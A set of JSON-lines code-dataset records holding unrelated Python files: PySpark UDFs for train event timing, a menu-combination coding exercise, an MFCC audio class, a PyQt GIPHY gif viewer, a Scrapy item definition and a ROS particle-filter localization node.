{"seq_id":"191453102","text":"##List of Functions (Update as more added in)\n#startTimes\n#failTimes\n#removeDuplicates\n#getClosestStartsandTimes\n#timeOnOff\n#shutTimes\n\n\n\nimport pandas as pd\nimport numpy as np\nfrom pyspark.sql.types import *\nfrom pyspark.sql.functions import pandas_udf,PandasUDFType\n\nschemaST = StructType([\n    StructField(\"CSN\", StringType()),\n    StructField(\"EventID\", LongType()),\n    StructField(\"DateTime\", StringType())\n])\n\n    \n\n@pandas_udf(schemaST, functionType=PandasUDFType.GROUPED_MAP)\ndef startTimes(df):\n    gr = df['CSN'].iloc[0]#used for the default returned dataframe if no data being returned\n    EventID = 65533\n
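    # keep only start events (EventID 65533), in chronological order\n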
    events = df[df['EventID']==EventID].sort_values(['DateTime']) #start events\n    DateTime = pd.to_numeric(pd.to_datetime(events['DateTime']))/1e9 #convert ns to s\n    DateTimeNext = DateTime.shift(periods=-1) # -1 because we want to find the gap until the NEXT one (ie. if THIS event failed)\n    time_diff = (DateTimeNext-DateTime) #Find the difference in event times\n    df_less15m = events[((time_diff>(30*60)) | (time_diff.isnull()))]#more than 30 min or when time_diff is null, as that is the last recorded event\n    default_df = pd.DataFrame([[gr,EventID,'None']]) #Returned if no start events detected - filter out using Datetime == none\n    if len(df_less15m.index)>0:\n        return_df = pd.DataFrame(df_less15m[['CSN','EventID','DateTime']])\n        #reset column names, this needs to be done otherwise it won't match the schema above. It works when we do .mean() etc\n        #because that doesn't give a named column when we create the dataframe, whereas this does.\n        return_df = return_df.T.reset_index(drop=True).T #this feels hacky\n        return return_df\n    else:\n        return default_df\n\n\n\n\n\n\n##FAIL TIMES UDF\n\nschemaFT = StructType([\n    StructField(\"CSN\", StringType()),\n    StructField(\"EventID\", IntegerType()),\n    StructField(\"DateTime\", StringType())\n])\n\n@pandas_udf(schemaFT, functionType=PandasUDFType.GROUPED_MAP)\ndef failTimes(df):\n    gr = df['CSN'].iloc[0]#used for the default returned dataframe if no data being returned\n    EventID = 65533\n    events = df[df['EventID']==EventID].sort_values(['DateTime'])\n    DateTime = pd.to_numeric(pd.to_datetime(events['DateTime']))/1e9 #convert ns to s\n    DateTimeNext = DateTime.shift(periods=-1) # -1 because we want to find the gap until the NEXT one (ie. if THIS event failed)\n    time_diff = (DateTimeNext-DateTime)\n    df_less15m = events[((time_diff<(30*60)) & (time_diff > 10))]#more than 10s, less than 30 mins\n    default_df = pd.DataFrame([[gr,EventID,'None']])\n    if len(df_less15m.index)>0:\n        return_df = pd.DataFrame(df_less15m[['CSN','EventID','DateTime']])\n        #reset column names, this needs to be done otherwise it won't match the schema above. It works when we do .mean() etc\n        #because that doesn't give a named column when we create the dataframe, whereas this does.\n        return_df = return_df.T.reset_index(drop=True).T #this feels hacky\n        return return_df\n    else:\n        return default_df\n\n\n\n\n\n##REMOVE DUPLICATES UDF\n\nschemaRD = StructType([\n    StructField(\"CSN\", StringType()),\n    StructField(\"EventID\", IntegerType()),\n    StructField(\"EventIDNext\", IntegerType()),\n    StructField(\"DateTime\", StringType()),\n    StructField(\"DateTimeInt\", IntegerType()),\n    StructField(\"DateTimeIntNext\", IntegerType()),\n    StructField(\"timeDiff\", IntegerType())\n])\n\n@pandas_udf(schemaRD, functionType=PandasUDFType.GROUPED_MAP)\ndef removeDuplicates(df):\n    df.rename(columns=lambda x: x.lstrip(), inplace = True)\n    \n    gr = df['CSN'].iloc[0]#used for the default returned dataframe if no data being returned\n    EventID = 65533\n    df['DateTimeInt'] = pd.to_numeric(pd.to_datetime(df['DateTime']))/1e9 #convert ns to s\n    df = df.sort_values(['EventID','DateTimeInt'])\n\n    df['DateTimeIntNext'] = df['DateTimeInt'].shift(periods=-1) # -1 because we want to find the gap until the NEXT one (ie. if THIS event failed)\n    df['EventIDNext'] = df['EventID'].shift(periods=-1)\n    \n    df['timeDiff'] = (df['DateTimeIntNext']-df['DateTimeInt'])\n    \n    #Remove the rows with timeDiff between -1 and 1 and the same event ID\n    dResult = df[((df.timeDiff < -1) | (df.timeDiff > 1)) | (df.EventID != df.EventIDNext)]\n    \n    #If empty array: i.e. only one event type happens, all at the same time, return the first row\n    if dResult.empty:\n        dResult = df.iloc[[0]]\n    return dResult\n\n\n\n\nschemaGCST = StructType([\nStructField(\"CSN\", StringType()),\nStructField(\"EventID\", IntegerType()),\nStructField(\"DateTime\", StringType()), \nStructField(\"TimeToStart\", IntegerType()),\nStructField(\"DateTimeInt\", IntegerType()),\nStructField(\"startIndex\", IntegerType())\n])\n\n@pandas_udf(schemaGCST, functionType=PandasUDFType.GROUPED_MAP)\ndef getClosestStartsandTimes(df):\n    df.rename(columns=lambda x: x.lstrip(), inplace = True)\n    gr = df['CSN'].iloc[0]#used for the default returned dataframe if no data being returned\n\n    #Get time in seconds\n    df['DateTimeInt'] = pd.to_numeric(pd.to_datetime(df['DateTime']))/1e9 #convert ns to s\n\n    #Get Start Event times - startID can be changed for any event to analyse train behaviour around that event\n    startID = 65533\n    startEvents = df[df['EventID']==startID]\n\n    #if no start events for CSN, return empty array, otherwise perform calcs - recommend that a check is performed after the calling of this function to check if any Datetime is listed as 'WRONG'\n    if startEvents.empty:\n        otherEvents = pd.DataFrame([[gr,65533,'WRONG',1,2,3]])\n    else:#Otherwise...\n        otherEvents = df[df['EventID']!=startID] #Remove the start events\n        st = startEvents['DateTimeInt'].values #outputs a list\n        ot = otherEvents['DateTimeInt'].values\n        \n        #put into a numpy array to make use of numpy functions\n        stNp = np.array(st) #stNp is a list of the times of the start events for the time period - compare time of each event to these vals\n        otNp = np.array(ot)\n        \n        #Get shape of df to find no of rows\n        col = len(ot)\n        ot = ot.reshape(col,1)\n\n        #Add start times to each row of dataframe\n        stList = stNp #Declaring the list to be appending stNp to\n        for i in range(col-1):\n            stList = np.vstack((stList,stNp))\n        \n        #compute the time diff for each start time\n        timeDiff = ot - stList\n        \n        #Find the minimum time value, and the index which it occurs at\n        x = np.argmin(abs(timeDiff),axis=1).reshape(col,1)\n        otherEvents['startIndex'] = x\n        \n        #Store the minimum time in the correct rows\n        timeDiffResult = []\n        for i in range(col):\n            val = (timeDiff[i,x[i]])\n            timeDiffResult.append(val[0])\n\n        #Make new numpy of timeDiffResult and get min - NOT USED ANY MORE\n        minTime = np.argmin(abs(np.array(timeDiffResult)))\n\n        #Make new col with the time between said event and the nearest start Time\n        otherEvents['TimeToStart'] = (timeDiffResult)\n\n\n    return otherEvents\n\n\n\n\nschemaTOO = StructType([\n    StructField(\"CSN\", StringType()),\n    StructField(\"Good\", LongType()),\n    StructField(\"Bad\", LongType())\n])\n\n@pandas_udf(schemaTOO, functionType=PandasUDFType.GROUPED_MAP)\n\ndef timeOnOff(df):\n    #Order the data by time (Seconds) and get time Diff\n    df = df.sort_values(['DateTime'])\n    DateTime = pd.to_numeric(pd.to_datetime(df['DateTime']))/1e9 #convert ns to s\n    DateTimeNext = DateTime.shift(periods=-1) # -1 because we want to find the gap until the NEXT one (ie. if THIS event failed)\n\n    #get event ID diff - no sort\n    EventID = df['EventID']\n    EventIDNext = EventID.shift(periods=-1).values\n    EventID = EventID.values\n\n    #Remove last row\n    EventID = EventID[:-1]\n    EventIDNext = EventIDNext[:-1]\n\n    EventIDDiff = abs(EventIDNext - EventID)\n    #Good where start-shut-start-shut\n    good = sum(EventIDDiff)\n    bad = len(EventIDDiff) - good\n\n    gr = df['CSN'].iloc[0]\n    default_df = pd.DataFrame([[gr,good,bad]])\n    return default_df\n\n\n\n\n##SHUT TIMES UDF\nschemaShT = StructType([\n    StructField(\"CSN\", StringType()),\n    StructField(\"EventID\", LongType()),\n    StructField(\"DateTime\", StringType())\n])\n@pandas_udf(schemaShT, functionType=PandasUDFType.GROUPED_MAP)\ndef shutTimes(df):\n    gr = df['CSN'].iloc[0]#used for the default returned dataframe if no data being returned\n    EventID = 65534\n    events = df[df['EventID']==EventID].sort_values(['DateTime']) #shut events\n    DateTime = pd.to_numeric(pd.to_datetime(events['DateTime']))/1e9 #convert ns to s\n    DateTimeNext = DateTime.shift(periods=-1) # -1 because we want to find the gap until the NEXT one (ie. if THIS event failed)\n    time_diff = (DateTimeNext-DateTime)\n    df_less15m = events[((time_diff>(10*60)) | (time_diff.isnull()))]#more than 10 min, or the last recorded event\n    default_df = pd.DataFrame([[gr,EventID,'None']])\n    if len(df_less15m.index)>0:\n        return_df = pd.DataFrame(df_less15m[['CSN','EventID','DateTime']])\n        #reset column names, this needs to be done otherwise it won't match the schema above. It works when we do .mean() etc\n        #because that doesn't give a named column when we create the dataframe, whereas this does.\n        return_df = return_df.T.reset_index(drop=True).T #this feels hacky\n        return return_df\n    else:\n        return default_df\n\n\n","sub_path":"TrainDNAFunctions.py","file_name":"TrainDNAFunctions.py","file_ext":"py","file_size_in_byte":9352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"323432824","text":"from itertools import combinations\nfrom collections import Counter\ndef solution(orders, course):\n    answer = []\n    for k in course: #course sizes to offer, e.g. [2,3,4] -> AB... / ADF... / ABCD...\n        candidates = []\n        for menu_li in orders:\n            for li in combinations(menu_li, k): #build every non-repeating size-k combination from the order (combinations, not permutations)\n                res = ''.join(sorted(li)) #sort each size-k combination alphabetically and join it into a string\n                candidates.append(res) #append the string to the list of course-menu candidates\n        sorted_candidates = Counter(candidates).most_common()\n        #count the candidates with a Counter and rank them by how often they were ordered, e.g. (AB,4),(AF,3)....\n        answer += [menu for menu, cnt in sorted_candidates if cnt > 1 and cnt == sorted_candidates[0][1]]\n        #from the frequency-ranked candidates, add the most-ordered menus to the answer list\n        #cnt > 1 -> a menu ordered only once is excluded, even if it ranks first\n        # cnt == sorted_candidates[0][1] -> sorted_candidates[0][1] is the order count of the top-ranked menu\n    return sorted(answer) #return in alphabetical order\n\n# n = list(input().split())\n# m = list(map(int,input().split()))\n# print(solution(n,m))\n\n# ABCFG AC CDE ACDE BCFG ACDEH\n# 2 3 4","sub_path":"2.메뉴_리뉴얼.py","file_name":"2.메뉴_리뉴얼.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"498631813","text":"\nfrom .base import Representation\n\nfrom acousticsim.exceptions import AcousticSimError\nfrom acousticsim.analysis.mfcc import file_to_mfcc, file_to_mfcc_praat\n\n\nclass Mfcc(Representation):\n    \"\"\"\n    Mel frequency cepstrum coefficient representation of a sound.\n\n    Parameters\n    ----------\n    file_path : str\n        Filepath of wav file to process\n\n    min_freq : int\n        Minimum frequency in Hertz\n\n    max_freq : int\n        Maximum frequency in Hertz\n\n    num_coeffs : int\n        Number of cepstrum coefficients\n\n    win_len : float\n        Window length in seconds\n\n    time_step : float\n        Time step between successive frames\n\n    num_filters : int, defaults to 26\n        Number of triangular filters in the filterbank\n\n    use_power : bool, defaults to True\n        Flag for keeping first cepstrum coefficient, which corresponds\n        to the power in the frame\n\n    deltas : bool, defaults to False\n        Flag to calculate the delta coefficients\n    \"\"\"\n    _is_windowed = True\n\n    def __init__(self, file_path, win_len, time_step, min_freq=80, max_freq=7800,\n                 num_filters=26, num_coeffs=13, use_power=True, deltas=False, data=None, attributes=None):\n        Representation.__init__(self, file_path, data, attributes)\n        self.min_freq = min_freq\n        self.max_freq = max_freq\n        self.num_coeffs = num_coeffs\n        self.ranges = [None] * self.num_coeffs\n        self.win_len = win_len\n        self.time_step = time_step\n        self.num_filters = num_filters\n        self.use_power = use_power\n        self.deltas = deltas\n\n    def process(self, algorithm='rastamat', executable_path=None, reset=False):\n        if algorithm not in ['rastamat', 'praat']:\n            raise AcousticSimError('Mfcc algorithm must be one of: rastamat, praat')\n        if reset:\n            self.data = {}\n        if self.data:\n            raise AcousticSimError('Data already exists for this representation, use reset=True to generate new data.')\n        if algorithm == 'rastamat':\n            data = file_to_mfcc(self.file_path, self.win_len, self.time_step, self.min_freq, self.max_freq,\n                                self.num_filters, self.num_coeffs, self.use_power, self.deltas)\n        else:\n            data = file_to_mfcc_praat(self.file_path, executable_path, self.win_len, self.time_step,\n                                      self.min_freq, self.max_freq,\n                                      self.num_filters, self.num_coeffs, self.use_power, self.deltas)\n        self.data = data\n\n    def norm_amp(self, new_ranges):\n        \"\"\"\n        Normalize the ranges of coefficients to a set of ranges.\n\n        Parameters\n        ----------\n        new_ranges : list of tuple\n            New ranges for each coefficient to normalize to\n\n        \"\"\"\n        for i, r in enumerate(new_ranges):\n            new_min, new_max = r\n            if self.ranges[i] is None:\n                old = [x[i] for x in self.data.values()]\n                self.ranges[i] = [min(old), max(old)]\n            for k, v in self.data.items():\n                normed = (v[i] - self.ranges[i][0]) / (self.ranges[i][1] - self.ranges[i][0])\n                self.data[k][i] = (normed * (new_max - new_min)) + 
new_min\n","sub_path":"acousticsim/representations/mfcc.py","file_name":"mfcc.py","file_ext":"py","file_size_in_byte":3229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"195793798","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n__author__ = 'ipetrash'\n\n\n# SOURCE: https://ru.stackoverflow.com/q/1134473/201445\n\n\nimport json\nimport time\nimport sys\nfrom pathlib import Path\n\nimport requests\n\nfrom PyQt5.QtWidgets import (\n QApplication, QMainWindow, QVBoxLayout, QHBoxLayout, QFrame, QMessageBox,\n QLineEdit, QPushButton, QLabel, QScrollArea, QWidget, QGridLayout\n)\nfrom PyQt5.QtCore import QThread, pyqtSignal, Qt, QRegExp\nfrom PyQt5.QtGui import QRegExpValidator, QMovie\n\nfrom config import GIPHY_API_KEY\n\n# Absolute file name\nTEMP_DIR = Path(__file__).resolve().parent / 'temp'\nTEMP_DIR.mkdir(exist_ok=True)\n\n\ndef log_uncaught_exceptions(ex_cls, ex, tb):\n text = '{}: {}:\\n'.format(ex_cls.__name__, ex)\n import traceback\n text += ''.join(traceback.format_tb(tb))\n\n print(text)\n QMessageBox.critical(None, 'Error', text)\n sys.exit(1)\n\n\nsys.excepthook = log_uncaught_exceptions\n\n\nclass SearchGifThread(QThread):\n SITE_URL = 'https://api.giphy.com/v1'\n\n about_add_gif = pyqtSignal(dict)\n\n def __init__(self, name_gif=None):\n super().__init__()\n\n self.name_gif = name_gif\n\n def get_gif(self) -> dict:\n url = f'{SearchGifThread.SITE_URL}/gifs/search?api_key={GIPHY_API_KEY}&q={self.name_gif}'\n\n try:\n rs = requests.get(url)\n rs.raise_for_status()\n\n data = json.loads(rs.content.decode('utf-8'))['data']\n if not data:\n # TODO: emit 'not found' to MainWindow\n data = {'error': 1}\n return data\n\n return data\n\n except Exception as err:\n # TODO: emit error to MainWindow\n print(err)\n\n return {'error': 1}\n\n def _process_gif(self, data: dict, index: int) -> dict:\n url_gif = data[index]['images']['fixed_width']['url']\n image_rs = requests.get(url_gif)\n image_rs.raise_for_status()\n\n file_name = TEMP_DIR / f\"img{index}.gif\"\n with open(file_name, 'wb') as f:\n f.write(image_rs.content)\n\n data = {'row': index // 3, 'col': index % 3, 'error': None, 'file_name': str(file_name)}\n return data\n\n def run(self):\n data = self.get_gif()\n if 'error' in data:\n # TODO: emit error to MainWindow\n return\n\n for i in range(20):\n data_gif = self._process_gif(data, i)\n self.about_add_gif.emit(data_gif)\n\n time.sleep(1)\n\n\nclass MainWindow(QMainWindow):\n def __init__(self):\n super().__init__()\n\n self.width = self.size().width()\n self.height = self.size().height()\n self.left = 200\n self.top = 300\n self.title = 'Gif Manager'\n\n self.search_gif_thread = SearchGifThread()\n self.search_gif_thread.started.connect(self.on_start)\n self.search_gif_thread.finished.connect(self.on_finish)\n self.search_gif_thread.about_add_gif.connect(self.add_gif)\n\n self.init_window()\n self.init_ui()\n\n self.gif_edit.setText('cat')\n\n def init_window(self):\n self.setGeometry(self.left, self.top, self.width, self.height)\n self.setWindowTitle(self.title)\n\n def init_ui(self):\n root_layout = QVBoxLayout()\n gif_data_layout = QHBoxLayout()\n gif_data_layout.setAlignment(Qt.AlignTop)\n self.gif_data_frame = QFrame()\n self.gif_edit = QLineEdit()\n self.gif_edit.returnPressed.connect(self.search_gif)\n regex = QRegExp('[a-z-A-Z]+')\n validator = QRegExpValidator(regex)\n self.gif_edit.setValidator(validator)\n self.gif_edit.setPlaceholderText('Enter name gif')\n gif_search_button = QPushButton('Search 
gif')\n gif_search_button.clicked.connect(self.search_gif)\n gif_data_layout.addWidget(self.gif_edit)\n gif_data_layout.addWidget(gif_search_button)\n self.gif_data_frame.setLayout(gif_data_layout)\n root_layout.addWidget(self.gif_data_frame)\n self.info_label = QLabel('Something went wrong. Check that the request was made correctly.')\n self.info_label.setAlignment(Qt.AlignHCenter)\n self.info_label.hide()\n root_layout.addWidget(self.info_label)\n self.scroll = QScrollArea()\n self.scroll.setStyleSheet('background: rgba(255, 255, 255, 30%);')\n self.scroll.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOn)\n self.scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\n self.scroll.setWidgetResizable(True)\n scrollWidget = QWidget()\n self.gifs_layout = QGridLayout()\n scrollWidget.setLayout(self.gifs_layout)\n self.scroll.setWidget(scrollWidget)\n root_layout.addWidget(self.scroll)\n root_widget = QWidget()\n root_widget.setLayout(root_layout)\n self.setCentralWidget(root_widget)\n\n def on_finish(self):\n self.gif_data_frame.show()\n\n def on_start(self):\n self.info_label.hide()\n self.scroll.show()\n self.gif_data_frame.hide()\n\n def search_gif(self):\n # TODO: replace on QListWidget\n for i in range(self.gifs_layout.count()):\n self.gifs_layout.itemAt(i).widget().deleteLater()\n\n self.search_gif_thread.name_gif = self.gif_edit.text()\n self.search_gif_thread.start()\n\n def add_gif(self, data):\n if data['error']:\n self.gif_data_frame.show()\n self.scroll.hide()\n self.info_label.show()\n return\n\n row, col, error, file_name = data.values()\n movie = QMovie(file_name)\n movie.setSpeed(200)\n label_gif = QLabel()\n label_gif.setMovie(movie)\n movie.start()\n\n self.gifs_layout.addWidget(label_gif, row, col)\n label_gif.show()\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n\n mw = MainWindow()\n mw.show()\n\n sys.exit(app.exec_())\n","sub_path":"qt__pyqt__pyside__pyqode/GIPHY__gif/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"404298654","text":"# -*- coding: utf-8 -*-\n\nfrom scrapy.item import Item, Field\nfrom scrapy.loader import ItemLoader\nfrom scrapy.loader.processors import TakeFirst, MapCompose, Join\n\nclass LeboncoinItem(Item):\n doc_id = Field()\n doc_url = Field()\n \n title = Field()\n desc = Field()\n c = Field()\n \n img_urls = Field()\n thumb_urls = Field()\n \n user_url = Field()\n user_id = Field()\n user_name = Field()\n\n upload_date = Field()\n upload_epoch = Field()\n \n check_date = Field()\n check_epoch = Field()\n\n urg = Field()\n premium = Field()\n \n\n region = Field()\n addr_locality = Field()\n location = Field()\n","sub_path":"scrapy/leboncoin/items.py","file_name":"items.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"482796400","text":"#!/usr/bin/env python\n\n#-----------------------------------------------------------------------------\n# University of California Berkeley\n# Department of Mechanical Engineering\n# Model Predictive Control Laboratory\n#\n# Capstone Project 2015-2016:\n# Fault-Tolerant Control in Autonomous Driving - Team A (Localization)\n#\n# Team-Members : Leo Li\n# Joe Wu\n# Byunghyun Shin\n# Kilian Schindler\n#\n# Supervisors : Francesco Borrelli (Prof. 
Dr.)\n# Ashwin Carvalho\n#-----------------------------------------------------------------------------\n#\n# ABOUT THIS FILE\n# This file is going to be the ROS node executing the particle filter. However,\n# it still needs to be implemented.\n#\n# REVISION HISTORY\n# [Mar 18, 2016] created\n# [Mar 30, 2016] work in progress - left to do:\n# 1.) read in V_lateral_meas and dot_Psi_mes\n# 2.) think about what to do if other meaurements than GPS\n# are not available\n# 3.) what if computation takes more than allotted time\n#\n#-----------------------------------------------------------------------------\n\n\n\nimport rospy\nimport numpy as np\nfrom std_msgs.msg import String, Float64, Int32\nfrom localize.msg import LaneMeasure\nfrom geometry_msgs.msg import Pose2D\nimport LPF_functions_rosnode as pf\nimport logging\n\n\n\nlogging.basicConfig(filename='/home/mpc/Localization/workspace/src/localize/log/test1.log',level=logging.DEBUG)\n\n\n\nX_meas = 0.\nY_meas = 0.\nPsi_meas = 0.\ndot_Psi_meas = 0.\nV_straight_meas = 0.\nV_lateral_meas = 0.\ndel_f_meas = 0.\n\na_r0 = 0.\na_r1 = 0.\na_r2 = 0.\na_r3 = 0.\na_r_quality = 0.\n\na_l0 = 0.\na_l1 = 0.\na_l2 = 0.\na_l3 = 0.\na_l_quality = 0.\n\nGPS_available = 0\nV_straight_available = 0\ndel_f_available = 0\nV_lateral_available = 0\ndot_Psi_available = 0\nRightLane_available = 0\nLeftLane_available = 0\n\n\n\n##############################################################################\n## ----------------- ADJUST PARTICLE FILTER SETTINGS HERE ----------------- ##\n## vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv ##\n\n\n## 1.) Iteration Frequency [Hz]\n################################\nfrequency = 50\n\n\n## 2.) Track Data (un-comment one option below)\n################################################\n#filepath = '../../../../Data Files/CAN/CPG_Oval/t1.mat'\n#filepath = '../../../../Data Files/CAN/CPG_WindingTrack/WT_LSRL_clean.mat'\n\n\n## 3.) Origin of GPS coordinate frame\n#######################################\nGPS_Pos0 = [-118.0266,35.0536]\n\n\n## 4.) Model and Sensor Setting\n################################\nactivate_DynamicModel = 1\nactivate_LaneMeas = 1\n\n\n## 5.) GPS Acceptance Settings\n###############################\nGPS_accept_interval = 10\nGPS_deny_interval = 100\nactivate_GPS_reset = 1\n\n\n## 6.) 
Filter Parameters\n##########################\n\n# number of particles\nnum_particles = 100\n\n# bias of V_lateral signal (guessed by Ashwin, needs to be measured)\ngps_V_lateral_bias = 0.02\n\n# standard deviation of process noise for dt = 0.02s\nstraight_position_noise = 0.01 # tuned ('run_LPF_OverallParamTuning.m')\nturn_position_noise = 0.0005 # tuned ('run_LPF_OverallParamTuning.m')\nlateral_velocity_noise = 0.1 # tuned ('run_LPF_OverallParamTuning.m')\nturn_velocity_noise = 0.0001 # tuned ('run_LPF_OverallParamTuning.m')\n\n# standard deviation of measurement noise\ngps_X_noise = 0.03 # tuned ('run_LPF_OverallParamTuning.m')\ngps_Y_noise = 0.03 # tuned ('run_LPF_OverallParamTuning.m')\ngps_Psi_noise = 0.002 # tuned ('run_LPF_OverallParamTuning.m')\ngps_V_lateral_noise = 0.002 # tuned ('run_LPF_OverallParamTuning.m')\ndot_Psi_noise = 0.005 # tuned ('run_LPF_OverallParamTuning.m')\na_r0_noise = 0.005 # tuned ('run_LPF_OverallParamTuning.m')\na_l0_noise = 0.005 # tuned ('run_LPF_OverallParamTuning.m')\na_r1_noise = 0.0005 # tuned ('run_LPF_OverallParamTuning.m')\na_l1_noise = 0.0005 # tuned ('run_LPF_OverallParamTuning.m')\n\n# vehicle parameters\nmass = 1840.0 # [kg] mass of test vehicle\nIzz = 3477.0 # [kg*m^2] yaw moment of inertia\nlf = 1.105 # [m] distance from center of mass to front axis\nlr = 1.738 # [m] distance from center of mass to rear axis\n\n# Pacejka tire model parameters\nB_f = 0.1447\nB_r = 0.1678\nC_f = 0.1463\nC_r = 0.1709\nD_f = 1.9227e6\nD_r = 2.2490e6\nE_f = -0.3782\nE_r = -0.4420\n\n# thresholds for different functions\nPsi_rel_threshold = 1e-6 # maximum Psi_rel to be considered aligned [rad]\nLane_threshold = 5 # maximum acceptable distance to lanes [m]\nDynamicModel_threshold = 5 # minimum velocity to run dynamic model [m/s]\n\n# fraction of particles receiving throughput measurements\nfrac_through = 0.1\n\n\n## ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ##\n## ----------------- ADJUST PARTICLE FILTER SETTINGS HERE ----------------- ##\n##############################################################################\n\n\n\n# create GPS_available vector (determines access to GPS measurements) and initialize GPS_count\nGPS_accept = np.concatenate((np.ones(GPS_accept_interval),np.zeros(GPS_deny_interval)),axis=0)\nGPS_count = -1.\n\n\n\ndef callback1(pose):\n global X_meas, Y_meas, Psi_meas, GPS_available\n X_meas = pose.x\n Y_meas = pose.y\n Psi_meas = pose.theta\n GPS_available = 1\n #rospy.loginfo(\"Received GPS measurement.\")\n\ndef callback2(speed_straight):\n global V_straight_meas, V_straight_available\n V_straight_meas = speed_straight.data\n V_straight_available = 1\n #rospy.loginfo(rospy.get_caller_id() + \"Velocity = %f\\n\", v)\n\ndef callback3(sas):\n global del_f_meas, del_f_available\n del_f_meas = sas.data\n del_f_available = 1\n #rospy.loginfo(rospy.get_caller_id() + \"Steering Angle = %f\\n\", del_f)\n \ndef callback4(speed_lateral):\n global V_lateral_meas, V_lateral_available\n V_lateral_meas = speed_lateral.data\n V_lateral_available = 1\n #rospy.loginfo(rospy.get_caller_id() + \"Steering Angle = %f\\n\", del_f)\n \ndef callback5(dot_Psi):\n global dot_Psi_meas, dot_Psi_available\n dot_Psi_meas = dot_Psi.data\n dot_Psi_available = 1\n #rospy.loginfo(rospy.get_caller_id() + \"Steering Angle = %f\\n\", del_f)\n\ndef callback6(leftLane):\n global a_l0, a_l1, a_l2, a_l3, a_l_quality, LeftLane_available\n #left = (leftLane.a0,leftLane.a1,leftLane.a2,leftLane.a3,leftLane.quality)\n a_l0 = leftLane.a0\n a_l1 = 
leftLane.a1\n a_l2 = leftLane.a2\n a_l3 = leftLane.a3\n a_l_quality = leftLane.quality\n LeftLane_available = 1\n #rospy.loginfo(rospy.get_caller_id() + \"Left lane measurements received\\n\")\n\ndef callback7(rightLane):\n global a_r0, a_r1, a_r2, a_r3, a_r_quality, RightLane_available\n #right = (rightLane.a0,rightLane.a1,rightLane.a2,rightLane.a3,rightLane.quality)\n a_r0 = rightLane.a0\n a_r1 = rightLane.a1\n a_r2 = rightLane.a2\n a_r3 = rightLane.a3\n a_r_quality = rightLane.quality\n RightLane_available = 1\n #rospy.loginfo(rospy.get_caller_id() + \"Right lane measurements received\\n\")\n\n\ndef location_sender():\n global GPS_count, GPS_available, V_straight_available, del_f_available, V_lateral_available, dot_Psi_available, RightLane_available, LeftLane_available\n \n # initialize node\n rospy.init_node('location_sender', anonymous=True)\n \n # subscriptions\n # once location_sender receives the data it uses callback functions to update the variables\n rospy.Subscriber(\"pose\", Pose2D, callback1) \n rospy.Subscriber(\"speed_straight\", Float64, callback2)\n rospy.Subscriber(\"sas\", Float64, callback3)\n rospy.Subscriber(\"speed_lateral\", Float64, callback4)\n rospy.Subscriber(\"dot_Psi\", Float64, callback5)\n rospy.Subscriber(\"leftLane\", LaneMeasure,callback6)\n rospy.Subscriber(\"rightLane\",LaneMeasure,callback7)\n\n # publications\n pub = rospy.Publisher('location', Pose2D, queue_size=10)\n pub2 = rospy.Publisher('runtime', Int32, queue_size=10)\n \n # define filter rate\n rate = rospy.Rate(frequency) # 50hz\n \n \n \n # run localization particle filter\n while not rospy.is_shutdown():\n\n\n tic = rospy.get_rostime()\n \n \n GPS_count = (GPS_count+1) % (GPS_accept_interval+GPS_deny_interval)\n\n \n (X_estimate, Y_estimate, Psi_estimate) = pf.LPF_main( \\\n 1.0/frequency, num_particles, GPS_available*GPS_accept[GPS_count], \\\n activate_LaneMeas, activate_DynamicModel, activate_GPS_reset, \\\n X_meas, Y_meas, Psi_meas, dot_Psi_meas, \\\n V_straight_meas, V_lateral_meas, del_f_meas, \\\n a_r0, a_r1, a_r2, a_r3, a_r_quality, \\\n a_l0, a_l1, a_l2, a_l3, a_l_quality, \\\n straight_position_noise, turn_position_noise, lateral_velocity_noise, turn_velocity_noise, \\\n gps_X_noise, gps_Y_noise, gps_Psi_noise, gps_V_lateral_noise, dot_Psi_noise, \\\n a_r0_noise, a_l0_noise, a_r1_noise, a_l1_noise, \\\n gps_V_lateral_bias, mass, Izz, lf, lr, \\\n Psi_rel_threshold, Lane_threshold, DynamicModel_threshold, \\\n B_f, B_r, C_f, C_r, D_f, D_r, E_f, E_r, \\\n np.floor(frac_through*num_particles))\n \n \n toc = rospy.get_rostime()\n difference = (toc.nsecs - tic.nsecs)\n rospy.loginfo(\"%i\\n\",difference)\n \n \n \n #dif = str(difference)\n #logging.info(\"%s\\n\",dif)\n pose_estimate = Pose2D(X_estimate,Y_estimate,Psi_estimate) #Assign particle filter output to the message for publishing\n #rospy.loginfo(pose_out) # log the output from particle filter\n pub.publish(pose_estimate) # Publish the output from particle filter\n pub2.publish(difference)\n \n \n \n # reset GPS arrived flag to 0\n GPS_available = 0\n V_straight_available = 0\n del_f_available = 0\n V_lateral_available = 0\n dot_Psi_available = 0\n RightLane_available = 0\n LeftLane_available = 0\n \n \n\n # sleep for rest of time \n rate.sleep()\n\n\n\nif __name__ == '__main__':\n try:\n location_sender()\n except rospy.ROSInterruptException:\n 
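# rospy raises ROSInterruptException when the node is shut down (e.g. Ctrl-C); nothing to clean up here\n        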
